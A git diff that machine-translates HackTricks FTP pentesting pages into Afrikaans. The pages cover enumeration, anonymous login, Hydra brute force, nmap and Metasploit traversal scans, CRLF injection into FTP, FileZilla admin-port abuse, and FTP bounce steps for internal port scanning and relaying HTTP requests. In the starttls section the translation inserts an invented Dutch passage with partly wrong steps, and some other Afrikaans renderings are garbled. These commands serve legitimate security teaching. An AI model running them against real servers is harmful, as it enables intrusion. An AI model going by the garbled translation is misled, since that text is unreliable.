port N+1 to FTP Server. FTP **Server** then **initiates** the data **connection**, from **its port M to the port N+1** of the FTP Client. +Maar, as die FTP-kliënt 'n vuurwal opset wat die inkomende data-verbindings van buite beheer, kan aktiewe FTP 'n probleem wees. En 'n uitvoerbare oplossing hiervoor is Passiewe FTP. -But, if the FTP Client has a firewall setup that controls the incoming data connections from outside, then active FTP may be a problem. And, a feasible solution for that is Passive FTP. +In **Passiewe FTP** inisieer die kliënt die beheer verbindings vanaf sy poort N na die poort 21 van die FTP-bediener. Hierna gee die kliënt 'n **passv bevel** uit. Die bediener stuur dan een van sy poortnommers M na die kliënt. En die **kliënt** inisieer die data **verbindings** vanaf **sy poort P na poort M** van die FTP-bediener. -In **Passive FTP**, the client initiates the control connection from its port N to the port 21 of FTP Server. After this, the client issues a **passv comand**. The server then sends the client one of its port number M. And the **client** **initiates** the data **connection** from **its port P to port M** of the FTP Server. +Bron: [https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/](https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/) -Source: [https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/](https://www.thesecuritybuddy.com/vulnerabilities/what-is-ftp-bounce-attack/) +### Verbindingsfoutopsporing -### Connection debugging +Die **FTP** opdragte **`debug`** en **`trace`** kan gebruik word om te sien **hoe die kommunikasie plaasvind**. -The **FTP** commands **`debug`** and **`trace`** can be used to see **how is the communication occurring**. - -## Enumeration - -### Banner Grabbing +## Enumerasie +### Banner Gaping ```bash nc -vn 21 openssl s_client -connect crossfit.htb:21 -starttls ftp #Get certificate if any ``` +### Koppel aan FTP met behulp van starttls -### Connect to FTP using starttls +Om verbinding te maken met een FTP-server met behulp van starttls, moet je de volgende stappen volgen: +1. Gebruik een FTP-client zoals FileZilla of de commandoregelclient `ftp` om verbinding te maken met de FTP-server. +2. Verifieer of de FTP-server starttls ondersteunt. Dit kan worden gecontroleerd door de server te pingen of door de documentatie van de server te raadplegen. +3. Als de server starttls ondersteunt, moet je de FTP-client configureren om starttls te gebruiken. Dit kan meestal worden gedaan via de instellingen van de FTP-client. +4. Zodra starttls is ingeschakeld, kun je verbinding maken met de FTP-server zoals je normaal zou doen. De starttls-functie zorgt ervoor dat de communicatie tussen de client en de server wordt versleuteld. + +Het gebruik van starttls bij het verbinden met een FTP-server zorgt ervoor dat je gegevens veilig worden verzonden en beschermd zijn tegen afluisteren of onderschepping door kwaadwillende partijen. ``` lftp lftp :~> set ftp:ssl-force true lftp :~> set ssl:verify-certificate no lftp :~> connect 10.10.10.208 -lftp 10.10.10.208:~> login +lftp 10.10.10.208:~> login Usage: login [] lftp 10.10.10.208:~> login username Password ``` +### Ongeoorloofde enumerasie -### Unauth enum - -With **nmap** - +Met **nmap** ```bash sudo nmap -sV -p21 -sC -A 10.10.10.10 ``` - -You can us the commands `HELP` and `FEAT` to obtain some information of the FTP server: - +Jy kan die opdragte `HELP` en `FEAT` gebruik om inligting oor die FTP-bediener te verkry: ``` HELP 214-The following commands are recognized (* =>'s unimplemented): -214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV -214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD -214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP -214-NOOP FEAT OPTS AUTH CCC* CONF* ENC* MIC* -214-PBSZ PROT TYPE STRU MODE RETR STOR STOU -214-APPE REST ABOR USER PASS ACCT* REIN* LIST -214-NLST STAT SITE MLSD MLST +214-CWD XCWD CDUP XCUP SMNT* QUIT PORT PASV +214-EPRT EPSV ALLO* RNFR RNTO DELE MDTM RMD +214-XRMD MKD XMKD PWD XPWD SIZE SYST HELP +214-NOOP FEAT OPTS AUTH CCC* CONF* ENC* MIC* +214-PBSZ PROT TYPE STRU MODE RETR STOR STOU +214-APPE REST ABOR USER PASS ACCT* REIN* LIST +214-NLST STAT SITE MLSD MLST 214 Direct comments to root@drei.work FEAT 211-Features: - PROT - CCC - PBSZ - AUTH TLS - MFF modify;UNIX.group;UNIX.mode; - REST STREAM - MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*; - UTF8 - EPRT - EPSV - LANG en-US - MDTM - SSCN - TVFS - MFMT - SIZE +PROT +CCC +PBSZ +AUTH TLS +MFF modify;UNIX.group;UNIX.mode; +REST STREAM +MLST modify*;perm*;size*;type*;unique*;UNIX.group*;UNIX.mode*;UNIX.owner*; +UTF8 +EPRT +EPSV +LANG en-US +MDTM +SSCN +TVFS +MFMT +SIZE 211 End STAT #Info about the FTP server (version, configs, status...) ``` +### Anonieme aanmelding -### Anonymous login - -_anonymous : anonymous_\ -_anonymous :_\ +_anoniem : anoniem_\ +_anoniem :_\ _ftp : ftp_ - ```bash ftp >anonymous @@ -128,115 +126,104 @@ ftp >ascii #Set transmission to ascii instead of binary >bye #exit ``` - ### [Brute force](../../generic-methodologies-and-resources/brute-force.md#ftp) -Here you can find a nice list with default ftp credentials: [https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt) +Hier kan jy 'n mooi lys vind met verstek ftp-geloofsbriewe: [https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt) -### Automated - -Anon login and bounce FTP checks are perform by default by nmap with **-sC** option or: +### Outomaties +Anon login en bounce FTP kontroles word standaard uitgevoer deur nmap met die **-sC** opsie of: ```bash nmap --script ftp-* -p 21 ``` +## Blaaier verbinding -## Browser connection - -You can connect to a FTP server using a browser (like Firefox) using a URL like: - +Jy kan 'n FTP-bediener verbind met 'n blaaier (soos Firefox) deur gebruik te maak van 'n URL soos: ```bash ftp://anonymous:anonymous@10.10.10.98 ``` +Merk op dat as 'n **webtoepassing** data wat deur 'n gebruiker beheer word **direk na 'n FTP-bediener** gestuur word, kan jy dubbele URL-kodering `%0d%0a` (in dubbele URL-kodering is dit `%250d%250a`) byte stuur en die **FTP-bediener arbitrêre aksies laat uitvoer**. Een van hierdie moontlike arbitrêre aksies is om inhoud van 'n gebruiker se beheerde bediener af te laai, poortskandering uit te voer of te probeer kommunikeer met ander dienste wat op platte teks gebaseer is (soos http). -Note that if a **web application** is sending data controlled by a user **directly to a FTP server** you can send double URL encode `%0d%0a` (in double URL encode this is `%250d%250a`) bytes and make the **FTP server perform arbitrary actions**. One of this possible arbitrary actions is to download content from a users controlled server, perform port scanning or try to talk to other plain-text based services (like http). - -## Download all files from FTP - +## Laai alle lêers vanaf FTP af ```bash wget -m ftp://anonymous:anonymous@10.10.10.98 #Donwload all wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all ``` - -If your user/password has special characters, the [following command](https://stackoverflow.com/a/113900/13647948) can be used: - +As jou gebruikersnaam/wagwoord spesiale karakters bevat, kan die [volgende opdrag](https://stackoverflow.com/a/113900/13647948) gebruik word: ```bash wget -r --user="USERNAME" --password="PASSWORD" ftp://server.com/ ``` +## Sommige FTP-opdragte -## Some FTP commands - -* **`USER username`** -* **`PASS password`** -* **`HELP`** The server indicates which commands are supported -* **`PORT 127,0,0,1,0,80`**This will indicate the FTP server to establish a connection with the IP 127.0.0.1 in port 80 (_you need to put the 5th char as "0" and the 6th as the port in decimal or use the 5th and 6th to express the port in hex_). -* **`EPRT |2|127.0.0.1|80|`**This will indicate the FTP server to establish a TCP connection (_indicated by "2"_) with the IP 127.0.0.1 in port 80. This command **supports IPv6**. -* **`LIST`** This will send the list of files in current folder - * **`LIST -R`** List recursively (if allowed by the server) -* **`APPE /path/something.txt`** This will indicate the FTP to store the data received from a **passive** connection or from a **PORT/EPRT** connection to a file. If the filename exists, it will append the data. -* **`STOR /path/something.txt`** Like `APPE` but it will overwrite the files -* **`STOU /path/something.txt`** Like `APPE`, but if exists it won't do anything. -* **`RETR /path/to/file`** A passive or a port connection must be establish. Then, the FTP server will send the indicated file through that connection -* **`REST 6`** This will indicate the server that next time it send something using `RETR` it should start in the 6th byte. -* **`TYPE i`** Set transfer to binary -* **`PASV`** This will open a passive connection and will indicate the user were he can connects -* **`PUT /tmp/file.txt`** Upload indicated file to the FTP +* **`USER gebruikersnaam`** +* **`PASS wagwoord`** +* **`HELP`** Die bediener dui aan watter opdragte ondersteun word +* **`PORT 127,0,0,1,0,80`** Dit sal die FTP-bediener aandui om 'n verbinding met die IP 127.0.0.1 op poort 80 te vestig (_jy moet die 5de karakter as "0" plaas en die 6de as die poort in desimaal of gebruik die 5de en 6de om die poort in heksadesimaal uit te druk_). +* **`EPRT |2|127.0.0.1|80|`** Dit sal die FTP-bediener aandui om 'n TCP-verbinding (_aangedui deur "2"_) met die IP 127.0.0.1 op poort 80 te vestig. Hierdie opdrag **ondersteun IPv6**. +* **`LIST`** Dit sal die lys van lêers in die huidige gids stuur +* **`LIST -R`** Lys rekursief (indien toegelaat deur die bediener) +* **`APPE /pad/iets.txt`** Dit sal die FTP aandui om die data wat ontvang is van 'n **passiewe** verbinding of van 'n **PORT/EPRT** verbinding na 'n lêer te stoor. As die lêernaam bestaan, sal dit die data byvoeg. +* **`STOR /pad/iets.txt`** Soos `APPE` maar dit sal die lêers oorskryf +* **`STOU /pad/iets.txt`** Soos `APPE`, maar as dit bestaan, sal dit niks doen nie. +* **`RETR /pad/na/lêer`** 'n Passiewe of 'n poortverbinding moet tot stand gebring word. Dan sal die FTP-bediener die aangeduide lêer deur daardie verbinding stuur +* **`REST 6`** Dit sal die bediener aandui dat volgende keer as dit iets stuur met behulp van `RETR`, moet dit begin by die 6de byte. +* **`TYPE i`** Stel oordrag na binêre in +* **`PASV`** Dit sal 'n passiewe verbinding oopmaak en die gebruiker aandui waar hy kan koppel +* **`PUT /tmp/lêer.txt`** Laai die aangeduide lêer na die FTP op ![](<../../.gitbook/assets/image (227).png>) -## FTPBounce attack +## FTPBounce-aanval -Some FTP servers allow the command PORT. This command can be used to indicate to the server that you wants to connect to other FTP server at some port. Then, you can use this to scan which ports of a host are open through a FTP server. +Sommige FTP-bedieners laat die opdrag PORT toe. Hierdie opdrag kan gebruik word om aan die bediener aan te dui dat jy wil koppel aan 'n ander FTP-bediener by 'n sekere poort. Dan kan jy dit gebruik om te skandeer watter poorte van 'n gasheer oop is deur 'n FTP-bediener. -[**Learn here how to abuse a FTP server to scan ports.**](ftp-bounce-attack.md) +[**Leer hier hoe om 'n FTP-bediener te misbruik om poorte te skandeer.**](ftp-bounce-attack.md) -You could also abuse this behaviour to make a FTP server interact with other protocols. You could **upload a file containing an HTTP request** and make the vulnerable FTP server **send it to an arbitrary HTTP server** (_maybe to add a new admin user?_) or even upload a FTP request and make the vulnerable FTP server download a file for a different FTP server.\ -The theory is easy: +Jy kan ook hierdie gedrag misbruik om 'n FTP-bediener te laat interaksie met ander protokolle. Jy kan **'n lêer oplaai wat 'n HTTP-versoek bevat** en die kwesbare FTP-bediener **stuur dit na 'n willekeurige HTTP-bediener** (_miskien om 'n nuwe administrateurgebruiker by te voeg?_) of selfs 'n FTP-versoek oplaai en die kwesbare FTP-bediener 'n lêer laat aflaai vir 'n ander FTP-bediener.\ +Die teorie is eenvoudig: -1. **Upload the request (inside a text file) to the vulnerable server.** Remember that if you want to talk with another HTTP or FTP server you need to change lines with `0x0d 0x0a` -2. **Use `REST X` to avoid sending the characters you don't want to send** (maybe to upload the request inside the file you needed to put some image header at the beginning) -3. **Use `PORT`to connect to the arbitrary server and service** -4. **Use `RETR`to send the saved request to the server.** +1. **Laai die versoek (binne 'n tekslêer) na die kwesbare bediener op.** Onthou dat as jy met 'n ander HTTP- of FTP-bediener wil praat, jy lyne met `0x0d 0x0a` moet verander +2. **Gebruik `REST X` om te voorkom dat jy die karakters stuur wat jy nie wil stuur nie** (miskien om die versoek binne die lêer te plaas, moes jy 'n beeldkop by die begin sit) +3. **Gebruik `PORT` om aan te sluit by die willekeurige bediener en diens** +4. **Gebruik `RETR` om die gestoorde versoek na die bediener te stuur.** -Its highly probably that this **will throw an error like** _**Socket not writable**_ **because the connection doesn't last enough to send the data with `RETR`**. Suggestions to try to avoid that are: +Dit is baie waarskynlik dat dit **'n fout sal veroorsaak soos** _**Socket not writable**_ **omdat die verbinding nie lank genoeg duur om die data met `RETR` te stuur nie**. Voorstelle om te probeer om dit te voorkom, is: -* If you are sending an HTTP request, **put the same request one after another** until **\~0.5MB** at least. Like this: +* As jy 'n HTTP-versoek stuur, **plaas dieselfde versoek agter mekaar** tot **\~0.5MB** ten minste. Soos hier: {% file src="../../.gitbook/assets/posts (1).txt" %} posts.txt {% endfile %} -* Try to **fill the request with "junk" data relative to the protocol** (talking to FTP maybe just junk commands or repeating the `RETR`instruction to get the file) -* Just **fill the request with a lot of null characters or others** (divided on lines or not) +* Probeer om **die versoek met "rommel" data te vul wat verband hou met die protokol** (as jy met FTP praat, dalk net rommelopdragte of die `RETR`-instruksie herhaal om die lêer te kry) +* Vul die versoek net met baie nulkarakters of ander karakters (verdeel op lyne of nie) -Anyway, here you have an [old example about how to abuse this to make a FTP server download a file from a different FTP server.](ftp-bounce-download-2oftp-file.md) +Hoe dan ook, hier het jy 'n [ou voorbeeld oor hoe om dit te misbruik om 'n FTP-bediener 'n lêer van 'n ander FTP-bediener te laat aflaai.](ftp-bounce-download-2oftp-file.md) -## Filezilla Server Vulnerability +## Filezilla Server-kwesbaarheid -**FileZilla** usually **binds** to **local** an **Administrative service** for the **FileZilla-Server** (port 14147). If you can create a **tunnel** from **your machine** to access this port, you can **connect** to **it** using a **blank password** and **create** a **new user** for the FTP service. - -## Config files +**FileZilla** bind gewoonlik aan 'n **plaaslike** Administratiewe diens vir die **FileZilla-Bediener** (poort 14147). As jy 'n **tonnel** van **jou masjien** kan skep om toegang tot hierdie poort te verkry, kan jy **daaraan koppel** deur 'n **leë wagwoord** te gebruik en 'n **nuwe gebruiker** vir die FTP-diens te skep. +## Konfigurasie-lêers ``` ftpusers ftp.conf proftpd.conf vsftpd.conf ``` +### Post-Exploitasie -### Post-Exploitation - -The default configuration of vsFTPd can be found in `/etc/vsftpd.conf`. In here, you could find some dangerous settings: +Die verstekkonfigurasie van vsFTPd kan gevind word in `/etc/vsftpd.conf`. Hierin kan jy 'n paar gevaarlike instellings vind: * `anonymous_enable=YES` * `anon_upload_enable=YES` * `anon_mkdir_write_enable=YES` -* `anon_root=/home/username/ftp` - Directory for anonymous. -* `chown_uploads=YES` - Change ownership of anonymously uploaded files -* `chown_username=username` - User who is given ownership of anonymously uploaded files -* `local_enable=YES` - Enable local users to login -* `no_anon_password=YES` - Do not ask anonymous for password -* `write_enable=YES` - Allow commands: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, and SITE +* `anon_root=/home/username/ftp` - Gids vir anonieme gebruikers. +* `chown_uploads=YES` - Verander eienaarskap van anoniem opgelaai lêers +* `chown_username=username` - Gebruiker wat eienaarskap van anoniem opgelaai lêers kry +* `local_enable=YES` - Stel plaaslike gebruikers in staat om aan te meld +* `no_anon_password=YES` - Moenie anoniem vir wagwoord vra nie +* `write_enable=YES` - Staaf opdragte toe: STOR, DELE, RNFR, RNTO, MKD, RMD, APPE, en SITE ### Shodan @@ -245,74 +232,70 @@ The default configuration of vsFTPd can be found in `/etc/vsftpd.conf`. In here,
-Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today. +Vind kwesbaarhede wat die belangrikste is sodat jy hulle vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) vandag. {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} *** - -## HackTricks Automatic Commands - ``` Protocol_Name: FTP #Protocol Abbreviation if there is one. Port_Number: 21 #Comma separated if there is more than one. Protocol_Description: File Transfer Protocol #Protocol Abbreviation Spelled out Entry_1: - Name: Notes - Description: Notes for FTP - Note: | - Anonymous Login - -bi <<< so that your put is done via binary +Name: Notes +Description: Notes for FTP +Note: | +Anonymous Login +-bi <<< so that your put is done via binary - wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59' - ^^to download all dirs and files +wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59' +^^to download all dirs and files - wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98' - if PASV transfer is disabled +wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98' +if PASV transfer is disabled - https://book.hacktricks.xyz/pentesting/pentesting-ftp +https://book.hacktricks.xyz/pentesting/pentesting-ftp Entry_2: - Name: Banner Grab - Description: Grab FTP Banner via telnet - Command: telnet -n {IP} 21 +Name: Banner Grab +Description: Grab FTP Banner via telnet +Command: telnet -n {IP} 21 Entry_3: - Name: Cert Grab - Description: Grab FTP Certificate if existing - Command: openssl s_client -connect {IP}:21 -starttls ftp +Name: Cert Grab +Description: Grab FTP Certificate if existing +Command: openssl s_client -connect {IP}:21 -starttls ftp Entry_4: - Name: nmap ftp - Description: Anon login and bounce FTP checks are performed - Command: nmap --script ftp-* -p 21 {IP} +Name: nmap ftp +Description: Anon login and bounce FTP checks are performed +Command: nmap --script ftp-* -p 21 {IP} Entry_5: - Name: Browser Connection - Description: Connect with Browser - Note: ftp://anonymous:anonymous@{IP} +Name: Browser Connection +Description: Connect with Browser +Note: ftp://anonymous:anonymous@{IP} Entry_6: - Name: Hydra Brute Force - Description: Need Username - Command: hydra -t 1 -l {Username} -P {Big_Passwordlist} -vV {IP} ftp - -Entry_7: - Name: consolesless mfs enumeration ftp - Description: FTP enumeration without the need to run msfconsole - Note: sourced from https://github.com/carlospolop/legion - Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' -``` +Name: Hydra Brute Force +Description: Need Username +Command: hydra -t 1 -l {Username} -P {Big_Passwordlist} -vV {IP} ftp +Entry_7: +Name: consolesless mfs enumeration ftp +Description: FTP enumeration without the need to run msfconsole +Note: sourced from https://github.com/carlospolop/legion +Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' +```
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**. +* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
diff --git a/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md b/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md index 22f8e7a2d..704a24828 100644 --- a/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md +++ b/network-services-pentesting/pentesting-ftp/ftp-bounce-attack.md @@ -1,65 +1,58 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-# FTP Bounce - Scanning +# FTP Bounce - Skandering -## Manual +## Handleiding -1. Connect to vulnerable FTP -2. Use **`PORT`**or **`EPRT`**(but only 1 of them) to make it establish a connection with the _\_ you want to scan: +1. Koppel aan die kwesbare FTP +2. Gebruik **`PORT`** of **`EPRT`** (maar slegs een van hulle) om dit te laat 'n verbinding met die _\_ wat jy wil skandeer, te vestig: - `PORT 172,32,80,80,0,8080`\ - `EPRT |2|172.32.80.80|8080|` -3. Use **`LIST`**(this will just send to the connected _\_ the list of current files in the FTP folder) and check for the possible responses: `150 File status okay` (This means the port is open) or `425 No connection established` (This means the port is closed) - 1. Instead of `LIST` you could also use **`RETR /file/in/ftp`** and look for similar `Open/Close` responses. +`PORT 172,32,80,80,0,8080`\ +`EPRT |2|172.32.80.80|8080|` +3. Gebruik **`LIST`** (dit sal net die huidige lys van lêers in die FTP-lys na die gekoppelde _\_ stuur) en kyk na die moontlike antwoorde: `150 File status okay` (Dit beteken die poort is oop) of `425 No connection established` (Dit beteken die poort is toe) +1. In plaas van `LIST` kan jy ook **`RETR /file/in/ftp`** gebruik en soek na soortgelyke `Open/Close`-antwoorde. -Example Using **PORT** (port 8080 of 172.32.80.80 is open and port 7777 is closed): +Voorbeeld van gebruik van **PORT** (poort 8080 van 172.32.80.80 is oop en poort 7777 is toe): ![](<../../.gitbook/assets/image (225).png>) -Same example using **`EPRT`**(authentication omitted in the image): +Dieselfde voorbeeld met behulp van **`EPRT`** (verifikasie weggelaat in die prent): ![](<../../.gitbook/assets/image (226).png>) -Open port using `EPRT` instead of `LIST` (different env) +Oop poort met behulp van `EPRT` in plaas van `LIST` (verskillende omgewing) ![](<../../.gitbook/assets/image (228).png>) ## **nmap** - ```bash nmap -b :@ nmap -Pn -v -p 21,80 -b ftp:ftp@10.2.1.5 127.0.0.1 #Scan ports 21,80 of the FTP nmap -v -p 21,22,445,80,443 -b ftp:ftp@10.2.1.5 192.168.0.1/24 #Scan the internal network (of the FTP) ports 21,22,445,80,443 ``` - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md b/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md index da1b22f4d..12fd39044 100644 --- a/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md +++ b/network-services-pentesting/pentesting-ftp/ftp-bounce-download-2oftp-file.md @@ -1,56 +1,52 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
